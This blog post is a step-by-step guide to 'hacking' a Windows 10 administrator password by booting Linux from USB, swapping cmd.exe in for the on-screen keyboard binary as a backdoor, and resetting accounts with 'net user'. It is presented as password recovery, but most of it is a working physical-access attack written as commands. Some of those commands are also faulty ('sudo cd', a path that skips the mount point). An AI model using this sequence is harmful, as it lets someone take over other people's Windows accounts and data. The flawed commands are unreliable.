Category Archives: Windows 10

Hacking a Windows 10 administrator password

Irreplaceable music and/or video files of priceless value could be yours again, if you know what to do next.

Maybe you just forgot your own password…

If you are in physical possession of a Windows machine, you can easily reset the passwords with a small amount of technical direction.

Download Ubuntu 16.04.05 GNOME LTS

Download Linux onto a non-target Windows system. If you have preference to download another Linux distro, feel free. The important facet here is that it has a Live or Test mode so you can run Linux from the USB drive (2GB+) without installing on a hard drive.

Create a bootable USB drive on Windows

Again, do this on a non-target Windows system.

Shutdown Windows with shift key

Do this with the actual target Windows system that you need to replace the password on. Hold the shift key down and select shutdown. It is important to hold the shift key down so the drive is fully released from hibernation. If you do not do this it may cause complications mounting the drive from Linux.

Insert the USB drive in target system

Boot with the USB drive, immediately upon power on tapping escape until it lets you select boot device. Select the USB drive to boot from.

Start a Linux terminal session.

$ sudo fdisk -l
$ sudo cd /media
$ sudo mkdir mnt
$ sudo mount /dev/sda1 mnt # <– substitute bold with your drive name from fdisk above
$ sudo cd Windows/System32 # <– case important
$ sudo cp -a osk.exe osk.exe.orig
$ sudo cp -a cmd.exe cmd.exe.orig
$ sudo cp cmd.exe osk.exe

Exit and shutdown the Ubuntu session, remove the USB drive.

Boot the target Windows system

  • Select the Ease of Access icon.
  • Next select the On-Screen Keyboard.
  • This will execute the renamed cmd.exe and bring up a command prompt as shown below.
  • Now you can type ‘net user’ to show all user accounts.
  • Then type ‘net user Administrator *’ to reset the password for Administrator as an example.
  • Do this for all user accounts and login with the new password, you should be set.

Be sure to copy cmd.exe.orig to cmd.exe and osk.exe.orig to osk.exe to undo the backdoor you created.


Be sure to join the
revolutionOSC Facebook Group